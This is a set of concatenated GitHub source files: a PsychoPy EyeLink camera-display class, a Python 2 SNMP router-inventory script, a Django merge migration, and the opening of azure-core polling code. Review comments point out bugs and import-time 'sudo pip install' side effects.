            lozenge1 = visual.ShapeStim(self.display, vertices = zip(Xs1, Ys1),lineWidth=2.0*self.cfX, lineColor=color, closeShape=False)
            lozenge2 = visual.ShapeStim(self.display, vertices = zip(Xs2, Ys2),lineWidth=2.0*self.cfX, lineColor=color, closeShape=False)
        lozenge1.draw()
        lozenge2.draw()
        line1.draw()
        line2.draw()

    def get_mouse_state(self):
        """Get the current mouse position and status.

        Returns ((mX, mY), pressed) in camera-image pixel coordinates,
        clamped to the image bounds.
        """
        X, Y = self.mouse.getPos()
        mX = self.size[0]/2 + X*1.0/self.cfX
        mY = self.size[1]/2 - Y*1.0/self.cfY
        if mX <=0: mX = 0
        if mX > self.size[0]: mX = self.size[0]
        if mY < 0: mY = 0
        if mY > self.size[1]: mY = self.size[1]
        state = self.mouse.getPressed()[0]
        return ((mX, mY), state)

    def get_input_key(self):
        """ this function will be constantly pools, update the stimuli here is you need
        dynamic calibration target """
        if not self.display_open:
            return None
        ky=[]
        for keycode in event.getKeys(modifiers=False):
            k= pylink.JUNK_KEY
            if keycode == 'f1': k = pylink.F1_KEY
            elif keycode == 'f2': k = pylink.F2_KEY
            elif keycode == 'f3': k = pylink.F3_KEY
            elif keycode == 'f4': k = pylink.F4_KEY
            elif keycode == 'f5': k = pylink.F5_KEY
            elif keycode == 'f6': k = pylink.F6_KEY
            elif keycode == 'f7': k = pylink.F7_KEY
            elif keycode == 'f8': k = pylink.F8_KEY
            elif keycode == 'f9': k = pylink.F9_KEY
            elif keycode == 'f10': k = pylink.F10_KEY
            elif keycode == 'pageup': k = pylink.PAGE_UP
            elif keycode == 'pagedown': k = pylink.PAGE_DOWN
            elif keycode == 'up': k = pylink.CURS_UP
            elif keycode == 'down': k = pylink.CURS_DOWN
            elif keycode == 'left': k = pylink.CURS_LEFT
            elif keycode == 'right': k = pylink.CURS_RIGHT
            elif keycode == 'backspace': k = ord('\b')
            elif keycode == 'return': k = pylink.ENTER_KEY
            elif keycode == 'space': k = ord(' ')
            elif keycode == 'escape':
                # escape aborts: forwarded as 'q' plus an abort flag
                k = 'q'
                self.esc_pressed = True
            elif keycode == 'q':
                k = pylink.ESC_KEY
                self.state = None
            elif keycode == "c":
                k = ord("c")
                self.state = "calibration"
            elif keycode == "v":
                k = ord("v")
                self.state = "validation"
            elif keycode == "a":
                k = ord("a")
            elif keycode == "i":
                # toggle extra info in the camera image; no key forwarded
                self.extra_info = not self.extra_info
                k = 0
            elif keycode == 'tab': k = ord('\t')
            elif keycode in string.ascii_letters: k = ord(keycode)
            # NOTE(review): the branch below assigns 'key', not 'k', and
            # the assigned value is never used -- looks like a typo for
            # "k = 0"; verify against upstream EyeLinkCoreGraphicsPsychoPy.
            elif k== pylink.JUNK_KEY: key = 0
            # if modifier['alt']==True: mod = 256
            # else: mod = 0
            ky.append(pylink.KeyInput(k, 0))
            #event.clearEvents()
        return ky

    def exit_image_display(self):
        """Clcear the camera image"""
        self.clear_cal_display()
        self.display.flip()

    def alert_printf(self,msg):
        """Print error messages."""
        print "Error: " + msg

    def setup_image_display(self, width, height):
        """ set up the camera image, for newer APIs, the size is 384 x 320 pixels"""
        self.title.autoDraw = True
        self.last_mouse_state = -1
        self.size = (width, height)

    def image_title(self, text):
        """Draw title text below the camera image"""
        self.title.text = text
        title_pos = (0, 0-self.size[0]/2.0*self.cfY-self.msgHeight)
        self.title.pos = title_pos

    def draw_image_line(self, width, line, totlines, buff):
        """Display image pixel by pixel, line by line.

        Each call appends one scanline (palette indices resolved through
        self.pal) to self.imagebuffer; on the last line the buffer is
        converted to an image and drawn.
        """
        #self.size = (width, totlines)
        i =0
        while i <width:
            self.imagebuffer.append(self.pal[buff[i]])
            i= i+1
        if line == totlines:
            bufferv = self.imagebuffer.tostring()
            # NOTE(review): array.tostring() and Image.fromstring() are
            # Python-2 / old-PIL APIs -- this path will not run on
            # Python 3; confirm the target runtime.
            try:
                img = Image.frombytes("RGBX", (width, totlines), bufferv) # Pillow
            except:
                img = Image.fromstring("RGBX", (width, totlines), bufferv) # PIL
            imgResize = img.resize((self.size[0], self.size[1]))
            imgResizeVisual = visual.ImageStim(self.display, image=imgResize)
            imgResizeVisual.draw()
            self.draw_cross_hair()
            self.display.flip()
            self.imagebuffer = array.array(self.imgBuffInitType)

    def set_image_palette(self, r,g,b):
        """Given a set of RGB colors, create a list of 24bit numbers representing the pallet.
        I.e., RGB of (1,64,127) would be saved as 82047, or the number 00000001 01000000 011111111"""
        self.imagebuffer = array.array(self.imgBuffInitType)
        #self.clear_cal_display()
        sz = len(r)
        i =0
        self.pal = []
        # NOTE(review): r and b are swapped below (rf comes from b[i],
        # bf from r[i]) -- presumably deliberate BGR->RGB packing for the
        # "RGBX" buffer; verify against the camera image byte order.
        while i < sz:
            rf = int(b[i])
            gf = int(g[i])
            bf = int(r[i])
            self.pal.append((rf<<16) | (gf<<8) | (bf))
            i = i+1
| {
"content_hash": "3ae0b79d2675271b6b33c94ee84af487",
"timestamp": "",
"source": "github",
"line_count": 464,
"max_line_length": 150,
"avg_line_length": 42.82543103448276,
"alnum_prop": 0.5430023652559005,
"repo_name": "StevenM1/flashtask",
"id": "13e64ad26b1a5a95d0559d9a9f6e1d4c94644280",
"size": "20009",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "exp_tools/eyelink/_eyetracker/EyeLinkCoreGraphicsPsychoPy.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "22917045"
},
{
"name": "Mathematica",
"bytes": "879590"
},
{
"name": "Python",
"bytes": "335678"
}
],
"symlink_target": ""
} |
import os, argparse, json, collections, time, re, logging
from snimpy.manager import Manager as M
from snimpy.manager import load
from pyasn1.type import univ
# NOTE(review): each try/except below shells out to "sudo pip install" at
# import time when a dependency is missing. That is a side effect (and a
# privilege escalation) most environments will not want, and the bare
# "except:" also hides unrelated import errors; consider failing with a
# clear ImportError message instead. The final block even tries to
# pip-install "logging", which is part of the standard library.
try:
    from ipcalc import Network
except:
    os.system("sudo pip install ipcalc")
    from ipcalc import Network
try:
    from termcolor import colored
except:
    os.system("sudo pip install termcolor")
    from termcolor import colored
try:
    from texttable import Texttable
except:
    os.system("sudo pip install texttable")
    from texttable import Texttable
try:
    import logging
except:
    os.system("sudo pip install logging")
    import logging
def convertMac(octet):
    """Convert a binary MAC address (octet string) to colon-separated hex.

    Fixes two defects of the original implementation: the joined string was
    built but never returned (the function always returned None), and it
    relied on a ``binascii`` import that is missing at module level, which
    raised NameError at runtime.

    :param octet: raw MAC address bytes (typically 6 octets).
    :return: lowercase hex string such as "00:1a:2b:3c:4d:5e".
    """
    # bytearray() yields one integer per octet on both Python 2 and 3.
    return ":".join("%02x" % b for b in bytearray(octet))
def convertIP(octet):
    """Convert a binary IPv4 address (octet string) to dotted-decimal form.

    The original depended on a ``binascii`` import that is never made at
    module level (NameError at runtime); this version uses only builtins.

    :param octet: raw IPv4 address bytes (4 octets).
    :return: dotted-decimal string such as "192.168.1.1".
    """
    # bytearray() yields one integer per octet on both Python 2 and 3.
    return ".".join(str(b) for b in bytearray(octet))
# ++++++++++++++++++++
# Module logger setup. NOTE(review): "logging" was already imported in the
# header above; this re-import is harmless but redundant.
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
# --------------------
############## Load MIBs
# NOTE(review): RFC1213-MIB is loaded twice (here and below for TCP
# sessions); the second load is redundant but harmless.
load("RFC1213-MIB") # sysName, ecc..
load("IF-MIB") # ifDescr, ecc..
load("IP-FORWARD-MIB") # routing table
load("IP-MIB") # ipAddress
load("OSPF-MIB") # ospf
load("MPLS-L3VPN-STD-MIB") # vrf
load("MPLS-LDP-STD-MIB") # ldp
load("BGP4-MIB") # bgp
load("ISIS-MIB") # isis
load("RFC1213-MIB") # tcp sessions
# If the Cisco CDP MIB cannot be loaded, fetch it (plus its dependencies)
# from Cisco's FTP site and ask the user to restart.
# NOTE(review): bare "except:", "sudo wget" side effects and a hard-coded
# Homebrew libsmi 0.4.8 path make this fragile outside the author's macOS
# setup; it also calls exit() at import time.
try:
    load("CISCO-CDP-MIB") # cdp
except:
    print "smilint -s -l1 CISCO-CDP-MIB"
    os.system("smilint -s -l1 CISCO-CDP-MIB")
    os.system("sudo wget ftp://ftp.cisco.com/pub/mibs/v2/CISCO-TC.my -O /usr/local/Cellar/libsmi/0.4.8/share/mibs/iana/CISCO-TC.my")
    os.system("sudo wget ftp://ftp.cisco.com/pub/mibs/v2/CISCO-VTP-MIB.my -O /usr/local/Cellar/libsmi/0.4.8/share/mibs/iana/CISCO-VTP-MIB.my")
    os.system("sudo wget ftp://ftp.cisco.com/pub/mibs/v2/CISCO-SMI.my -O /usr/local/Cellar/libsmi/0.4.8/share/mibs/iana/CISCO-SMI.my")
    os.system("sudo wget ftp://ftp.cisco.com/pub/mibs/v2/CISCO-CDP-MIB.my -O /usr/local/Cellar/libsmi/0.4.8/share/mibs/iana/CISCO-CDP-MIB.my")
    print "Install MIBS for CDP... done"
    print "Restart application!"
    exit()
def minimize(string):
    """Return a shortened interface name (saves space when printing).

    Unknown interface types are returned unchanged.
    """
    # (substring to look for, text to replace, replacement), checked in order.
    # The "Mgm" entry deliberately matches on "Mgm" but replaces "MgmtEth",
    # exactly as the original if/elif chain did.
    abbreviations = (
        ("GigabitEthernet", "GigabitEthernet", "Gi"),
        ("FastEthernet", "FastEthernet", "Fe"),
        ("Loopback", "Loopback", "Lo"),
        ("Mgm", "MgmtEth", "Mgt"),
    )
    for needle, old, new in abbreviations:
        if needle in string:
            return string.replace(old, new)
    return string
def expand(string):
    """Expand an abbreviated interface name ("Gi0/1" -> "GigabitEthernet0/1").

    NOTE(review): the substring test also fires on names that merely contain
    "Gi" (including an already-expanded "GigabitEthernet..."), in which case
    the replacement garbles the name. Behavior kept as-is; confirm callers
    only pass abbreviated names.
    """
    return string.replace("Gi", "GigabitEthernet") if "Gi" in string else string
tree = lambda: collections.defaultdict(tree)
class MftSNMP(object):
snmpCommunity = "public"
snmpTarget = ""
host = ""
intfs = []
vrfs = []
arps = []
onbrs = []
ldps = []
cdpEns = []
cdpEntrys = []
snmpDevice = tree()
def __init__(self, target, community):
self.snmpTarget = target
self.snmpCommunity = community
m = M(host=self.snmpTarget, community=self.snmpCommunity, version=2, none=True)
##################### methods
for val in m.ifIndex.keys():
self.intfs.append( \
[val, \
m.ifDescr[val], \
m.ifAlias[val], \
m.ifMtu[val], \
str(m.ifAdminStatus[val])[:-3], \
str(m.ifOperStatus[val])[:-3], \
m.ifType[val], \
m.ifPhysAddress[val]] \
)
ips = []
for val in m.ipAdEntIfIndex:
ips.append( \
(m.ifDescr[m.ipAdEntIfIndex[val]], \
m.ipAdEntAddr[val], \
m.ipAdEntNetMask[val]) \
)
for v in m.mplsL3VpnIfVpnClassification.keys():
self.vrfs.append( \
(v[0], \
m.ifDescr[v[1]]) \
)
for i in m.ipNetToMediaPhysAddress:
self.arps.append( \
(m.ifDescr[i[0]], \
i[1], \
m.ipNetToMediaPhysAddress[i]) \
)
tcps = []
for i in m.tcpConnLocalAddress:
tcps.append( \
(i[0], \
i[1], \
i[2], \
i[3]) \
)
#"#"#"#"#"# da rifare
ospfareas = []
area = dict()
areatype = dict()
areatype2 = dict()
for index1,val1 in enumerate(m.ospfAreaId.iteritems()):
area[index1] = val1[1]
for index1,val1 in enumerate(m.ospfImportAsExtern.iteritems()):
areatype[index1] = val1[1]
for index1,val1 in enumerate(m.ospfAreaSummary.iteritems()):
areatype2[index1] = val1[1]
areaintfs = []
for en,i in enumerate(m.ospfIfIpAddress):
for v in m.ipCidrRouteIfIndex:
if str(i[0]) == v[0]:
#print str(i[2])[:-2]
areaintfs.append( \
[i[0],\
m.ifDescr[m.ipCidrRouteIfIndex[v]], \
m.ospfIfAreaId[i], \
m.ospfIfHelloInterval[i], \
m.ospfIfRtrDeadInterval[i], \
m.ospfIfType[i], \
m.ospfIfRtrPriority[i], \
m.ospfIfDesignatedRouter[i], \
m.ospfIfBackupDesignatedRouter[i]] \
)
for metric in m.ospfIfMetricIpAddress:
if m.ospfIfMetricIpAddress[metric] == i[0]:
areaintfs[en].append( \
m.ospfIfMetricValue[metric] \
)
############## Interface Auth
for nbr in m.ospfNbrIpAddr:
self.onbrs.append( \
[m.ospfNbrRtrId[nbr], \
m.ospfNbrIpAddr[nbr], \
m.ospfNbrPriority[nbr], \
m.ospfNbrState[nbr], \
bin(m.ospfNbrOptions[nbr])] \
)
for i in m.mplsLdpPeerTransportAddr:
for v in m.ipCidrRouteIfIndex:
if str(i[2])[:-2] == v[0]:
#print str(i[2])[:-2]
self.ldps.append( \
(i[0], \
i[1], \
str(i[2])[:-2], \
m.ifDescr[m.ipCidrRouteIfIndex[v]]) \
)
for i in m.cdpInterfaceEnable:
self.cdpEns.append( \
(m.ifDescr[i], \
m.cdpInterfaceEnable[i]) \
)
for i in m.cdpCacheAddress.keys():
self.cdpEntrys.append( \
[m.cdpCacheDeviceId[i], \
m.ifDescr[i[0]], \
m.cdpCacheCapabilities[i], \
m.cdpCacheVersion[i], \
m.cdpCacheDevicePort[i], \
m.cdpCacheAddress[i], \
m.cdpCachePlatform[i]]\
)
############## main object
self.host = str(m.sysName)
self.snmpDevice[self.host]['global']['sysName'] = self.host
self.snmpDevice[self.host]['global']['sysDescr'] = m.sysDescr.replace("\r\n"," ")
self.snmpDevice[self.host]['global']['sysObjectID'] = str(m.sysObjectID)
self.snmpDevice[self.host]['global']['sysUpTime'] = str(m.sysUpTime)
self.snmpDevice[self.host]['global']['sysLocation'] = m.sysLocation
######## routing
self.snmpDevice[self.host]['OSPF-MIB']['ospfRouterId'] = str(m.ospfRouterId)
self.snmpDevice[self.host]['BGP4-MIB']['bgpIdentifier'] = str(m.bgpIdentifier)
#"#"#"#"#"#"# verificare anche che lo stato sia establish
lrid = "None"
for tcp in tcps:
if str(tcp[1]) == '646' or str(tcp[3]) == '646':
lrid = tcp[0]
# self.snmpDevice[self.host]['MPLS-LDP-STD-MIB']['mplsLdpLsrId'] = str(m.mplsLdpLsrId)
# self.snmpDevice[self.host]['ISIS-MIB']['isisSysID'] = str(m.isisSysID)
self.snmpDevice[self.host]['CISCO-CDP-MIB']['cdpGlobalRun'] = str(m.cdpGlobalRun)
######## Interface
for intf in self.intfs:
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifDescr'] = intf[1]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifIndex'] = intf[0]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifAlias'] = intf[2]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifMtu'] = intf[3]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifAdminStatus'] = intf[4]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifOperStatus'] = intf[5]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifType'] = intf[6]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifPhysAddress'] = convertMac(intf[7])
######## ip address
for ip in ips:
if intf[1] == ip[0]:
self.snmpDevice[self.host]['interfaces'][intf[1]]['ipAdEntAddr'] = str(ip[1])
self.snmpDevice[self.host]['interfaces'][intf[1]]['ipAdEntNetMask'] = str(ip[2])
######## vrf
for vrf in self.vrfs:
if intf[1] == vrf[1]:
self.snmpDevice[self.host]['interfaces'][intf[1]]['MPLS-L3VPN-STD-MIB']['mplsL3VpnVrfName'] = str(vrf[0])
######## ARP
for i,arp in enumerate(self.arps):
if intf[1] == arp[0]:
if self.snmpDevice[self.host]['interfaces'][intf[1]]['ipAdEntAddr'] != str(arp[1]): #### da verificare
self.snmpDevice[self.host]['interfaces'][intf[1]]['ipNetToMediaNetAddress'][i] = str(arp[1])
self.snmpDevice[self.host]['interfaces'][intf[1]]['ipNetToMediaPhysAddress'][i] = str(arp[2])
######## OSPF
for areaintf in areaintfs:
if intf[1] == areaintf[1]:
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfAreaId'] = str(areaintf[2])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfHelloInterval'] = int(str(areaintf[3]).replace('.',''))
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfRtrDeadInterval'] = int(str(areaintf[4]).replace('.',''))
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfType'] = str(areaintf[5])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfRtrPriority'] = int(str(areaintf[6]).replace('.',''))
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfDesignatedRouter'] = str(areaintf[7])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfBackupDesignatedRouter'] = str(areaintf[8])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfMetricValue'] = int(str(areaintf[9]).replace('.',''))
# snmpDevice[host]['interfaces'][intf[1]]['OSPF-MIB']['area type'] = ""
# snmpDevice[host]['interfaces'][intf[1]]['OSPF-MIB']['area no summary'] = ""
# snmpDevice[host]['interfaces'][intf[1]]['OSPF-MIB']['int auth'] = ""
############## OSPF Neighbors filterd per interface
for i,onbr in enumerate(self.onbrs):
# print intf[1]
if str(onbr[1]) in Network(self.snmpDevice[self.host]['interfaces'][intf[1]]['ipAdEntAddr'] + "/" + self.snmpDevice[self.host]['interfaces'][intf[1]]['ipAdEntNetMask']):
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['adj'][i]['ospfNbrRtrId'] = str(onbr[0])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['adj'][i]['ospfNbrIpAddr'] = str(onbr[1])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['adj'][i]['ospfNbrPriority'] = str(onbr[2]).replace('.','')
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['adj'][i]['ospfNbrState'] = str(onbr[3])[:-3]
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['adj'][i]['ospfNbrOptions'] = str(onbr[4])
############## MPLS LDP Neighbors
for i,ldp in enumerate(self.ldps):
if intf[1] == ldp[3] :
self.snmpDevice[self.host]['interfaces'][intf[1]]['mplsLdpStdMIB']['adj'][i]['ospfNbrRtrId'] = str(ldp[2])
############## CDP Neighbors filterd per interface
for cdpEn in self.cdpEns:
if intf[1] == cdpEn[0]:
self.snmpDevice[self.host]['interfaces'][intf[1]]['CISCO-CDP-MIB']['cdpInterfaceEnable'] = str(cdpEn[1])[:-3]
if str(cdpEn[1])[-2] == "1":
for i,cdpEntry in enumerate(self.cdpEntrys):
self.snmpDevice[self.host]['interfaces'][intf[1]]['CISCO-CDP-MIB'][i]['cdpCacheDeviceId'] = str(cdpEntry[0])
self.snmpDevice[self.host]['interfaces'][intf[1]]['CISCO-CDP-MIB'][i]['cdpCacheDevicePort'] = str(cdpEntry[4])
slef.snmpDevice[self.host]['interfaces'][intf[1]]['CISCO-CDP-MIB'][i]['cdpCacheAddress'] = convertIP(cdpEntry[5])
self.snmpDevice[self.host]['interfaces'][intf[1]]['CISCO-CDP-MIB'][i]['cdpCachePlatform'] = str(cdpEntry[6])
def __str__(self):
return json.dumps(self.snmpDevice, sort_keys=True, indent=4, separators=(',', ': '))
def show_interfaces(self):
### build table with interfaces
table = Texttable()
table.set_cols_align(["c", "l", "l", "l", "l", "l"])
data = [["ifIndex","ifDescr","ifAlias","IPadd","AS","OS"]]
for line,interface in enumerate(self.snmpDevice[self.host]['interfaces']):
### check if the interface has an ip address
if self.snmpDevice[self.host]['interfaces'][interface]['ipAdEntAddr']:
data.append([str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']), \
minimize(str(self.snmpDevice[self.host]['interfaces'][interface]['ifDescr'])), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAlias']), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ipAdEntAddr']), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAdminStatus']), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifOperStatus']), \
])
else:
data.append([str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']), \
minimize(str(self.snmpDevice[self.host]['interfaces'][interface]['ifDescr'])), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAlias']), \
"--", \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAdminStatus']), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifOperStatus']), \
])
table.add_rows(data, header=True)
return table.draw()
def ifStatEngine(self,choice,speedUnit="kb",secDelta=5):
### delta time bw two probes
sec = secDelta
### first probe
m = M(host=self.snmpTarget,community=self.snmpCommunity,none=True)
intfsOne = []
for val in m.ifIndex.keys():
if str(val) == str(choice):
intfsOne.append(int(val))
intfsOne.append(str(m.ifDescr[val]))
intfsOne.append(int(m.ifHCOutOctets[val]))
intfsOne.append(int(m.ifHCInOctets[val]))
intfsOne.append(int(m.ifHighSpeed[val]))
intfsOne.append(str(m.ifAlias[val]))
# print intfsOne
time.sleep(sec)
### first probe
m = M(host=self.snmpTarget,community=self.snmpCommunity,none=True)
intfsTwo = []
for val in m.ifIndex.keys():
if str(val) == str(choice):
intfsTwo.append(int(val))
intfsTwo.append(str(m.ifDescr[val]))
intfsTwo.append(int(m.ifHCOutOctets[val]))
intfsTwo.append(int(m.ifHCInOctets[val]))
intfsTwo.append(int(m.ifHighSpeed[val]))
intfsTwo.append(str(m.ifAlias[val]))
# print intfsTwo
# if interface has no HC speed attribute (like Loopback, null, ecc), set default interface speed
if intfsOne[4] == 0:
speed = 1000
else:
speed = intfsOne[4]
# calc speed based speedUnit set
if "kb" in speedUnit:
inSpeed = (((intfsTwo[2]-intfsOne[2]) * 8 * 100) / (sec * speed)) / 1024
outSpeed = (((intfsTwo[3]-intfsOne[3]) * 8 * 100) / (sec * speed)) / 1024
# return Out, In speed
return float(outSpeed), float(inSpeed)
def show_interfaces_speed(self, choice):
tree = lambda: collections.defaultdict(tree)
choice_explode = tree()
### build table with interfaces and current SPEED/sec
while True:
table = Texttable()
table.set_deco(Texttable.HEADER)
table.set_cols_align(["c", "l", "l", "l", "l"])
data = [["ifIndex","ifDescr","ifAlias","Out","In"]]
for i in range(len(choice)):
choice_explode[choice[i]]['Out'], choice_explode[choice[i]]['In'] = self.ifStatEngine(int(choice[i]),"kb",1)
os.system('clear')
for line,interface in enumerate(self.snmpDevice[self.host]['interfaces']):
for i,ch in enumerate(choice):
if str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']) == str(ch):
data.append([str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']), \
minimize(str(self.snmpDevice[self.host]['interfaces'][interface]['ifDescr'])), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAlias']), \
str(choice_explode[ch]['Out']), \
str(choice_explode[ch]['In']), \
])
### still print other interfaces, # if you don't want print out informations
break
if ch not in str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']):
data.append([str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']), \
minimize(str(self.snmpDevice[self.host]['interfaces'][interface]['ifDescr'])), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAlias']), \
"---", \
"---", \
])
table.add_rows(data, header=True)
print table.draw()
exit()
def ifstat(self,string="None"):
############## ifStat
if "None" in string: ### -i
print self.show_interfaces()
print ""
choice = raw_input("choose interface: ")
### 5,7
if "," in choice:
os.system('clear')
self.show_interfaces_speed(choice.split(","))
elif re.search('[\d+\,]+', string): ### -i 5[,7]
choice = string
if "," in choice:
os.system('clear')
self.show_interfaces_speed(choice.split(","))
elif re.search('\d+', string): ### -i 6
choice = string
elif re.search('[a-zA-Z]*', string): ### -i GPRX
m = M(host=self.snmpTarget,community=self.snmpCommunity,none=True)
choice = None
for val in m.ifIndex.keys():
if str(m.ifAlias[val]) == string:
choice = val
print ""
for i in self.snmpDevice[self.host]['interfaces']:
if int(choice) == self.snmpDevice[self.host]['interfaces'][i]['ifIndex']:
print self.snmpDevice[self.host]['interfaces'][i]['ifIndex'], " - ",self.snmpDevice[self.host]['interfaces'][i]['ifDescr']
print "\'" + str(self.snmpDevice[self.host]['interfaces'][i]['ifAlias']) + "\'"
print "\nOut\tIn"
while True:
OutSpeed, inSpeed = self.ifStatEngine(choice,"kb",1)
print OutSpeed, "\t", inSpeed
def summary(self):
print "hostname", self.snmpDevice[self.host]['global']['sysName']
print "OSPF RID", self.snmpDevice[self.host]['OSPF-MIB']['ospfRouterId']
print "BGP RID", self.snmpDevice[self.host]['BGP4-MIB']['bgpIdentifier']
print "Interface no.", len(self.snmpDevice[self.host]['interfaces'])
print "OSPF Adjacency", len(self.onbrs)
print "LDP Adjacency", len(self.ldps)
def walkInterfaces(self):
### cicle on interfaces
for int in self.snmpDevice[self.host]['interfaces']:
print "*",self.snmpDevice[self.host]['interfaces'][int]['ifDescr']
# if interface own an ip address
if self.snmpDevice[self.host]['interfaces'][int]["ipAdEntAddr"]:
# if interface belong into vrf
if self.snmpDevice[self.host]['interfaces'][int]["MPLS-L3VPN-STD-MIB"]:
# if interface has an ip arp neighbors
if len(self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress']) is not 0:
# show ip arp neighbors belong on this interface
for arp in self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress']:
# print vrf XXX arp neighbor
print " pint vrf", self.snmpDevice[self.host]['interfaces'][int]["MPLS-L3VPN-STD-MIB"]['mplsL3VpnVrfName'], \
self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress'][arp]
print " telnet", self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress'][arp], \
"/vrf ",self.snmpDevice[self.host]['interfaces'][int]["MPLS-L3VPN-STD-MIB"]['mplsL3VpnVrfName']
# if interface do not belong into vrf
else:
# if interface has an ip arp neighbors
if len(self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress']) is not 0:
# show ip arp neighbors belong on this interface
for arp in self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress']:
# print arp neighbor
print " ping", self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress'][arp]
print " telnet ", self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress'][arp]
| {
"content_hash": "38b797b27a09a81f3bf012778829d5dc",
"timestamp": "",
"source": "github",
"line_count": 552,
"max_line_length": 175,
"avg_line_length": 35.41123188405797,
"alnum_prop": 0.6369775413106871,
"repo_name": "mft3000/snmpEngine",
"id": "5d24ee6782f0df5f0cf0f40deeee7b119bf96b54",
"size": "20076",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "snmpEngine/snmpEngine.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "22381"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Merge migration: reconciles two divergent 0011 migrations of the
    # "tablemanager" app. It intentionally performs no schema operations.
    dependencies = [
        ('tablemanager', '0011_auto_20151021_1354'),
        ('tablemanager', '0011_auto_20151020_0912'),
    ]
    operations = [
    ]
| {
"content_hash": "6e43f78e5aa627b819627a809b8d234b",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 52,
"avg_line_length": 20.214285714285715,
"alnum_prop": 0.6501766784452296,
"repo_name": "rockychen-dpaw/borgcollector",
"id": "a61196678c9d87f00ab37295e10d7e5584d95d23",
"size": "307",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tablemanager/migrations/0012_merge.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9821"
},
{
"name": "JavaScript",
"bytes": "55"
},
{
"name": "Python",
"bytes": "720469"
},
{
"name": "TSQL",
"bytes": "9939"
}
],
"symlink_target": ""
} |
import abc
import base64
import json
from enum import Enum
from typing import TYPE_CHECKING, Optional, Any, Union
from ..exceptions import HttpResponseError, DecodeError
from . import PollingMethod
from ..pipeline.policies._utils import get_retry_after
from ..pipeline._tools import is_rest
from .._enum_meta import CaseInsensitiveEnumMeta
if TYPE_CHECKING:
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import (
HttpResponse,
AsyncHttpResponse,
HttpRequest,
)
ResponseType = Union[HttpResponse, AsyncHttpResponse]
PipelineResponseType = PipelineResponse[HttpRequest, ResponseType]
ABC = abc.ABC
_FINISHED = frozenset(["succeeded", "canceled", "failed"])
_FAILED = frozenset(["canceled", "failed"])
_SUCCEEDED = frozenset(["succeeded"])
def _finished(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FINISHED
def _failed(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FAILED
def _succeeded(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _SUCCEEDED
class BadStatus(Exception):
    """Raised when a polling response has an unexpected HTTP status code."""
    pass
class BadResponse(Exception):
    """Raised when a polling response is malformed (e.g. missing body or status)."""
    pass
class OperationFailed(Exception):
    """Raised when the long-running operation cannot proceed (failed/canceled)."""
    pass
def _as_json(response):
# type: (ResponseType) -> dict
"""Assuming this is not empty, return the content as JSON.
Result/exceptions is not determined if you call this method without testing _is_empty.
:raises: DecodeError if response body contains invalid json data.
"""
try:
return json.loads(response.text())
except ValueError:
raise DecodeError("Error occurred in deserializing the response body.")
def _raise_if_bad_http_status_and_method(response):
# type: (ResponseType) -> None
"""Check response status code is valid.
Must be 200, 201, 202, or 204.
:raises: BadStatus if invalid status.
"""
code = response.status_code
if code in {200, 201, 202, 204}:
return
raise BadStatus(
